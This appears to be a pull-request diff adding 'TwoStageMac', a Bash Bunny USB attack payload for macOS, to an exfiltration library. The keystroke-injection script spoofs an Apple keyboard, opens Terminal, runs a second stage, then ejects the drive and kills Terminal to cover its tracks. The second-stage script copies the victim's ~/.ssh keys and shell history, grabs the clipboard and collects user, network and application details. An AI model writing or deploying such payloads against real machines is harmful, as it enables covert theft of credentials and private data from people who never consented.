Merge pull request #347 from mathew-fleisch/master

Two Stage Mac Payload

payloads/library/exfiltration/TwoStageMac/README.md

@@ -0,0 +1,9 @@
+# Two Stage Mac
+
+Author: Draxiom
+
+## Description
+A simple two stage payload for OSX. First stage, opens terminal and executes a shell script, saved on the Bash Bunny's storage. Sample second stage does some device profiling.
+
+## Usage
+Overwrite second-stage.sh with custom script and plug into mac. It should open up terminal and execute the second stage via `sh /Volumes/BashBunny/switch#/second-stage.sh`. Loot is saved in /Volumes/BashBunny/loot/hostname/epoch/ and is passed into second-stage.sh as the parameter `$1`

payloads/library/exfiltration/TwoStageMac/payload.txt

@@ -0,0 +1,42 @@
+# Title:         TwoStageMac
+# Description:   A simple two stage payload for OSX. Sample second stage
+#                does some device profiling.
+# Author:        Draxiom
+# Props:         jdetmold
+# Version:       1.0
+# Category:      Exfiltration
+# Target:        OSX
+# Attack Modes:  HID, STORAGE
+
+LED SETUP
+ATTACKMODE HID VID_0X05AC PID_0X021E STORAGE
+GET SWITCH_POSITION
+
+# Global variables
+MOUNTING_LOCATION=/Volumes/BashBunny
+SECOND_STAGE=${MOUNTING_LOCATION}/payloads/${SWITCH_POSITION}/second-stage.sh
+LOOT_DIR=${MOUNTING_LOCATION}/loot/$\(hostname\)
+
+# Open terminal
+LED ATTACK
+RUN OSX terminal
+Q ENTER
+Q DELAY 200
+# Open new window in case there's already a terminal window open
+Q GUI n
+Q DELAY 100
+
+# Set up loot directory and pipe output to text file (named by epoch time)
+Q STRING NOW=$\(date +'%s'\)\; mkdir -p $LOOT_DIR/\$NOW\; sh $SECOND_STAGE ${LOOT_DIR}/\$NOW \> $LOOT_DIR/\$NOW/STDOUT.txt 2\> $LOOT_DIR/\$NOW/STDERR.txt
+Q ENTER
+
+# Eject
+LED CLEANUP
+Q STRING diskutil eject ${MOUNTING_LOCATION}
+Q ENTER
+Q STRING killall Terminal
+Q ENTER
+
+sync
+
+LED FINISH

payloads/library/exfiltration/TwoStageMac/second-stage.sh

@@ -0,0 +1,61 @@
+#!/bin/bash
+#
+# This is a sample second-stage script. It will scrape some interesting
+# information from a mac. The target loot directory is passed in as $1
+# I have added echo statements for each command to make it easier to parse
+# STDOUT when viewing loot afterwards. 
+
+echo "$ whoami"
+whoami
+
+echo "$ uname -a"
+uname -a
+
+echo "$ df -h"
+df -h
+
+echo "$ ls ~"
+ls -alF ~
+
+echo "$ cd ${1}"
+cd $1
+
+echo "$ cp -r ~/.ssh ssh"
+cp -r ~/.ssh $1/ssh
+
+echo "$ cp -r ~/.bash* ."
+cp -r ~/.bash* $1/.
+
+echo "for file in .*; do"
+for file in .*; do
+	# Skip "." and ".." and unhide every hidden file
+	if [[ "${file}" =~ ^\.*$ ]]; then
+		echo "Skip \"${file}\""
+	else
+		echo "mv ${file} ${file#.}"
+		mv "$file" "${file#.}"
+	fi
+done
+echo "done"
+
+# Lifted from library/recon/MacProfiler
+echo "$ history"
+history
+
+echo "$ osascript -e \"the clipboard\" > clipboard.txt"
+osascript -e "the clipboard" > clipboard.txt
+
+echo "$ dscl . list /Users | grep -v '_'"
+dscl . list /Users | grep -v '_'
+
+echo "$ ifconfig"
+ifconfig
+
+echo "$ curl ipecho.net/plain"
+curl ipecho.net/plain
+
+echo "$ osascript -e 'tell application \"System Events\" to get the name of every login item'"
+osascript -e 'tell application "System Events" to get the name of every login item'
+
+echo "$ ls /Applications/"
+ls /Applications/